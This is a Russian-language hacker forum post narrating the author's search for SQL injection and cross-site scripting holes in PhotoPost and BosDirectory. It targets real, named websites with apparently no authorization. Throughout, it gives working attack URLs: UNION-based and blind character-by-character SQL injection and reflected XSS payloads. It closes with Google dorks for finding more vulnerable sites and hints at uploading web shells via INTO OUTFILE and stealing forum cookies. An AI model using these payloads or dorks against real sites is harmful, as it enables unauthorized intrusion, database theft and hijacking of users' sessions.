Вообщем, день сразу начался здорово - во-первых, я наконец-то поспал хоть 6 часов за последние трое суток.
Во-вторых, идеально пообщался с весьма интересной особой, к которой я испытываю неподдельный интерес.
Но я не об этом. А о том, как я искал баги, и что нашёл.

Усевшись за стол, я задумался - "Если уж везет, то во всем."
И везде. И решил проверить рапространится ли моя удача в интернете.
Заруливаю на Google, забиваю запрос (в этот раз решил соригинальничать немного - попробовал указать сразу две переменных).
Запрос вернул много сайтов, но они мне не понадобились, ибо уже на втором сайте вместо ожидаемого инклуда я получил "неожидаемую" SQL инъекцию (не сразу, само собой, а минуты через две, т. к. сайт мне приглянулся и я решил на нём потестировать навыки (не ломателя, а поисковика)):

_http://www.sophoto.cn/photopost/showgallery.php?cat=501&si=&page=6&sort=1&perpage= 12&password=&ppuser=&what=&name='&=

Остальные ссылки буду давать через POST, привыкайте - к этому, это очень полезно и много безопаснее.

Скрипт в ответ громко выгугался словами:

MySQL error reported!

Сама перменная шла в запросе после оператора LIKE
внутри условия AND. Вообщем, проще показать:
Ладно, подумал я. Мне есть что ответить. Ответ выглядел так:

_http://www.sophoto.cn/photopost/showgallery.php
POST:cat=-501+from+photos+WHERE%20approved='1'+union+select+ 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0/*&si=&page=6&sort=1&perpage=12&password=&ppuser=&w hat=&name='&=

(Кол-во столбцов можно было узнать по выводу ошибки)

Далее, я попробовал продолжить запрос так, как будто бы никакой ошибки нет:

http://www.sophoto.cn/photopost/showgallery.php?cat=501&si=&page=6&sort=1&perpage= 12&password=&ppuser=&what=&name=%')+and(1=1)%20ORD ER%20BY%20disporder,lastpost%20DESC/*&=

Ошибки и впрямь не выпало, а это уже дало мне основания думать, что magic_quotes=Off, то есть кавычки модно будет попробовать, например, для заливки шелла при помощи INTO OUTFILE, ну, вообщем, Вы в курсе.

Далее я осознал, что LIMIT не ORDER )) и попробовал заюзать UNION.

_http://www.sophoto.cn/photopost/showgallery.php?cat=501&si=&page=6&sort=1&perpage= 12&password=&ppuser=&what=&name=no_name%')+union%2 0select%201,USER(),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9,0/*&=

Никаких цифр я не увидел, тем более, - имени юзера, по которым сайт общался с БД.

Ну ладно, будем перебирать посимвольно (никогда не юзайте скрипты! - чтобы понять ценность баги, над ней нужно попотеть)).

http://www.sophoto.cn/photopost/showgallery.php?cat=501&si=&page=6&sort=1&perpage= 12&password=&ppuser=&what=&name=%')+and((ascii(low er(substring(USER(),1,1)))%3E200))/*&=

Вообщем, не помню вернуло ли оно истину, но помню, что ..

И тогда я вспылил..... (с) )))

Нет, на самом деле, я в очередной раз задумался, постучал пальцами по столу и пришел к выводу о необходимости поиска другой аналогичной баги, но с более удачным выводом результатов. Само собой, бага нашлась, ведь то был мой счастливый день, да и баги по одиночке не ходят. )

Думаете сейчас я найду багу, через которую залбю шелл? Нет. Я нашел еще один бажный параметр с именем cat (не от слова кот, а от слова каталог)):

http://www.sophoto.cn/photopost/showgallery.php?cat=-501+from+photos+WHERE%20approved='1'+union+select+ 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0/*&si=&page=6&sort=1&perpage=12&password=&ppuser=&w hat=&name='&=


В этом случае ошибки явно не выкидывало, как впрочем не выкидывало ничего вообще. Blind, вообщем.

"Плохой сайт какой-то, неадекватный!" - подумал я. Потом посмотрел вниз страницы и увидел надпись:

Powered by Vbimage.


Что за VB? Visual Basic что ли? )
Удивило, что отсутсвовала версия - но так бывает, когда администраторы сайтов пытаются спрятать свои дырки ) , при этом грубо нарушая авторские права.
"Вот это и будет нашей зацепкой", - решил я.
In da Google:
powered Vbimage

Не помню точного ответа гугля (хотя дело былоо вчера), но кажется порядка трех страниц.
Побродив по страницам, я заметил 2 вещи:
данный скрипт либо идет вместе с vbulletin, как мод, либо лежит где-нить недалеко от папки /photopost/ либо имела надпись Powered by Photopost в титле..

Что за photopost такой? хорошо, что не photoget.
Проверим:
inurlhotopost inurl:name=

Скриптов было достаточно много, среди них в том числе, во главе стоял сайт разработчика данного скрипта. Его мы тоже потестим. Попозже. Сейчас нужно выяснить какие версии есть уязвимы.
На одном из сайтов, на котором работала данная уязвимость в титле я увидел Powered by PhotoPost 4.7.
Ага, надо попробовать:
intitle: Powered by PhotoPost 4.7
А еще на всякий случай просто:
Powered by PhotoPost 4.7

Первой страницей, которую вернул скрипт была:
photo.rol.ru/showphoto.php?photo=2640&password=0&sort=1&cat=500

"Хех."", - подумал я и начал менять параметры.

_http://photo.rol.ru/showgallery.php?cat=last1&si=&page=7&sort=1&perpag e=12&password=&ppuser=&what=&name='&=

Но ничего не вышло. Но справделивость всегда существует, да и день сегодня счастливый, поэтому кое-что я все же нашел. Конкретно - две XSS. А попробую-ка я не SQL, а XSS причем для того же параметра:

_http://photo.rol.ru/showgallery.php?cat=last1&si=&page=7&sort=1&perpag e=12&password=&ppuser=&what=&name=%22%3E%3Ch1%3EZd es%20mogla%20bit%20washa%20reklama.%20Ili%20sniffe r%20=)%3C/h1%3E&=

Ну... не все так плохо! Особенно, учитывая что в домене rol.ru существет весьма популярная почта с WEB-интерфейсом. А вдруг админы профильтруют переменную? Нужно подстраховаться.

_http://photo.rol.ru/showgallery.php?cat=last1&si=&page=7&sort=1&perpag e=12&password=&ppuser=&what=%22%3E%3Ch1%3Estraxowk a numer 1%3C/h1%3E&name=&=

_http://photo.rol.ru/showgallery.php?cat=last1&si=&page=7&sort=1&perpag e=12&password=&ppuser=%22%3E%3Ch1%3EN2%3C/h1%3E&what=&name=&=

В соседнем скрипте тоже была бага:
_http://photo.rol.ru/showphoto.php?photo=166735&size=big%22%3E%3Ch2%3EB ug%20here%3C/h2%3E&password=&sort=1&cat=&page=1

Вообщем, я думаю понятно, что за скрипты там стоят. Кстати, у меня вот руки не дошли закачать фотку с именем <script>alert()</script>. Но, имхо, активные XSS'ки там тоже в ходу.

Таксс.... А ведь уязвимость может быть и на других сайтах! Наведаемся к старым друзьям:

_http://www.sophoto.cn/photopost/showgallery.php?cat=501&si=%22%3E%3Ch1%3EFrom%201t en0.0net1%20with%20love%3C/h1%3E&page=6&sort=1&perpage=12&password=&ppuser=&w hat=&name=&=

Опаньки! Еще и XSS.
Тут я всерьез задумался на степенью кривизны творцов данного чуда. Пойдем к ним в гости.

В титульной части сайта было написано следующее:
PhotoPost PHP Photo Gallery With vBulletin and Other Forum Integration

Ога.... Я думаю понятно, насколько мне повезло - я имею ввиду, что сам скрипт photopost чаще всего как написано, будет рядом с форумами. А это значит что? Это значит, что даже если при помощи SQL ничего не поучится сделать с форумом, то куи утащить будет вполне реально. Как бы найти примерчик...
А далеко ходить не пришлось:
PhotoPost Sites In Action
И ниже ссылочка:

_http://www.photopost.com/action/index.php?cat_id=5'&pg=4&sort=date&sort_dir=a


как выснилсось, на большинстве указанных там сайтов, стоят новые версии PhotoPost'a. Жаль. Ладно потестируем сайт создателей. Долго тестиовать не пришлось: мало того, что они забоялись пользоваться своим творением, так еще пользовались чужим дырявым:

_http://www.photopost.com/action/index.php?cat_id=1

Опускаем глаза и видим:
BosDirectory v2.50

_http://www.photopost.com/action/index.php?cat_id=5+AND(1=2)/*&pg=4&sort=date&sort_dir=a

_http://www.photopost.com/action/index.php?cat_id=5+order+by+10/*&pg=4&sort=date&sort_dir=a

Выкидывает html код. А внизу ошибку выполения запроса:
The query: SELECT category_add FROM bos_categories WHERE category_id=5 order by 10/*
The result: Unknown column '10' in 'order clause'
Ну и отлично. Колумн нужный всео один.

_http://www.photopost.com/action/index.php?cat_id=5+union+select+1/*&pg=4&sort=date&sort_dir=a

Начинаю сомневаться в своей вменяемости:
MySQL error!
The query: SELECT category_parent,category_title FROM bos_categories WHERE category_id=5 union select 1/*
The result: The used SELECT statements have a different number of columns
Ладно, предположим мне показлось (а может это новый виж SQL-инъекии - джамп injection, или на****щая инъекция ) ).
На самом деле, как я понял, там просто в запросе истинном переменная встречается несколько раз, хотя..
Вообщем не суть. Суть в том, что моей целью было найти баги и я их нашел (шеллы я уже добывал, сейчас цель другая).

Ну и наконец, проверим н бажность создателся скрипта
BosDirectory

Отольются кошке мышкины слезы - идем на сайт второго создателя. Сразу находим:
_http://www.bosdev.com/phpinfo.php
Из этого файла можно узнать полный путь к вебу, а потом, при соответствующих правах заинсертить шелл...

ищем XSS. Находим:

_http://www.bosdev.com/demo/BosDirectory/search.php?type=basic&criteria=Anti-virus%22%3E%3Ch1%3Ealarm!%3C/h1%3E

Далее у меня в браузере началась вторая серия паранормалки (я трезвый был когда баги искал!):
_http://www.bosdev.com/demo/BosDirectory/search.php?type=basic&criteria=Anti-virus')%20and(1=2)/*
Все нормально, ошибок нет.
_http://www.bosdev.com/demo/BosDirectory/search.php?type=basic&criteria=Anti-virus')%20and(1=1)/*
(2 раза загрузить)

MySQL error!
The query: INSERT INTO bdir3_search_cache VALUES(2,'Anti-virus') and(1=2)/*')

Your search returned no results
Разве??

Чудеса. Жаль, то не MSSQL, смысл запроса не поменять.(

Но можно дополнить. Кстати, не знаю как Вам, а мне кажется что имя таблицы кэш там не спроста. И запросы каким-то образом кешируются, поэтомум грузить нужно по два раза.

http://www.bosdev.com/demo/BosDirectory/search.php?type=basic&criteria=Anti-virus')%20and(ascii(lower(substring(USER,1,8)))%3E 888)/*

Ну, и таким образом проводим инъекцию.

P. S. Кстати, скрипт сам оказался платным (49$)

Вообщем, итог всего похождения:

1) Многочисленные SQL и XSS инъекции на достаточно популярном проекте PHOTO POST. Скажу сразу - определить версии уязвимых скриптов оказалось, трудно, но уязвимы многие версии.

XSS: showphoto.php; showgallery.php
SQL: showgallery.php

Google trick:
powered Vbimage
intitle:Powered by Photopost
inurl:/photopos/


Пример:
XSS:
http://site.com/BosDirectory/search.php?type=basic&criteria=Anti-virus%22%3E%3Ch1%3Ealarm!%3C/h1%3E
SQL:
photopost/showgallery.php?cat=-501+from+photos+WHERE%20approved='1'+union+select+ 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0/*
Само собой, magic_quotes=Off. Но только для этой переменной, а их там, бажных достаточно.


2) Соответственно, SQL инъекция и XSS инъекции в платном скрипте BosDirectory.

XSS: скрипт search.php
SQL: скрипт index.php

Google trick:
Powered by BosDirectory
inurl:Bosdirectory

Пример:
XSS:
http://site.ru/showphoto.php?photo=166735&size=big%22%3E%3Ch2%3EB ug%20here%3C/h2%3E
SQL:
http://site.com/index.php?cat_id=5+order+by+10/*

P. P. S. я указал не все скрипты и не все бажные переменые - некоторые я упомянул в статье, некоторые даже не назвал ;-). Кроме того, не стоит забывать о таких прекрасных функциях как LOAD_FILE() и INSERT INTO. Я о них почти не упомняул. А ведь они часто помогают получить шелл.

Удачи!

Всегда готов помочь, если что-то непонятно - обращайтесь.

С уважением, 1ten0.0net1.

__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.